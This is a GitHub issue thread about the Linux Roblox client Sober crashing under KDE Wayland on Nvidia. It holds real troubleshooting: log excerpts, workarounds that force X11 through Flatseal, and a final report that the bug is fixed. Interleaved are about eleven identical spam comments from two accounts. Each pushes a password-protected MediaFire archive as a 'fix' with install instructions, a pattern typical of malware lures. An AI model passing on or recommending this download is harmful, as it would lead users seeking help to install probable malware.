### ISSUE TITLE
Crashes on Nvidia Wayland

### ISSUE THREAD

**Issue by Exotic0015** [vinegarhq/sober#183]
### Acknowledgement of checking existent issues

- [X] I have checked if my issue has already been reported, and I am certain that my problem has not already been addressed.

### What problem did you encounter?

Sober crashes seemingly at random, logs contain the following relevant lines:
```
kwin_wayland_wrapper[18377]: error in client communication (pid 82561)
2024-08-31T03:56:24.903Z,480.903595,4d8006c0,6,Debug wp_linux_drm_syncobj_surface_v1@58: error 3: explicit sync is used, but no buffer is attached
ERROR: Wayland display connection closed by server (fatal)
```

Fedora 40
KDE Plasma 6.1.4
Nvidia drivers version 560.35.03
egl-wayland 1.1.16

Tried disabling explicit sync by setting __NV_DISABLE_EXPLICIT_SYNC=1 in flatpak settings, still crashes

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by adantesarcade** [comment]
I have been able to play for longer periods of time using the wayland to x11 video bridge in the end it still crashed but worked for a much longer period of time.

**Comment by Exotic0015** [comment]
True, revoking access to Wayland thus forcing running through Xwayland makes Sober much more stable. The previous crash log makes me think that Sober has missing/incomplete explicit sync support which has been introduced recently.

**Comment by Vlad55432** [comment]
> Sober has missing/incomplete explicit sync support ...

I thought it was a nvidia drivers fault

**Comment by Naymmmm** [comment]
Nvidia is known to suck with Linux, but it may be a Sober issue, may time tell.

**Comment by adantesarcade** [comment]
I just upgraded to a 6750xt from the rtx 2060 i'll test and see if its nvidias problem

**Comment by adantesarcade** [comment]
Actually it seems that it can happen on amd cards on specific games.

**Comment by adantesarcade** [comment]
as of today this has started happening every time it worked last night but now its crashing after all launches

**Comment by SpiderUnderUrBed** [comment]
Same issue.

**Comment by adantesarcade** [comment]
> Same issue.

It seems lowering graphics could solve, I'm assuming it had something to do with a fault in some graphics drivers or wayland, only time will tell

**Comment by zbikk** [comment]
same issue here, can't pinpoint the issue of the crash, it feels very random.

**Comment by SpiderUnderUrBed** [comment]
I was told to follow these steps, I think they might work, ill keep everyone here notified if this solves my issues:
```
install flatseal
then open it and click on sober
then turn off wayland windowing system
then run sober again
if you see a black screen resize the window
```

**Comment by adantesarcade** [comment]
> I was told to follow these steps, I think they might work, ill keep everyone here notified if this solves my issues:
> 
> ```
> install flatseal
> then open it and click on sober
> then turn off wayland windowing system
> then run sober again
> if you see a black screen resize the window
> ```

I already tried that I while back the thing that made it work for me was turning down the graphics even though my gpu is more than capable of roblox.

**Comment by THEGAMER16** [comment]
Still going on.

**Comment by Vlad55432** [comment]
test sober with 565, I think most of issues have got fixed

**Comment by ArchUser02** [comment]
> test sober with nvidia driver v. 565, I think most of issues have got fixed

I fixed it by forcing it to use the x11 windowing system in flatseal. I turned off all fallbacks, and wayland windowing system; only forcing x11.

**Comment by V3L0C1T13S** [comment]
This has been fixed, and Sober now uses native Wayland by default again.
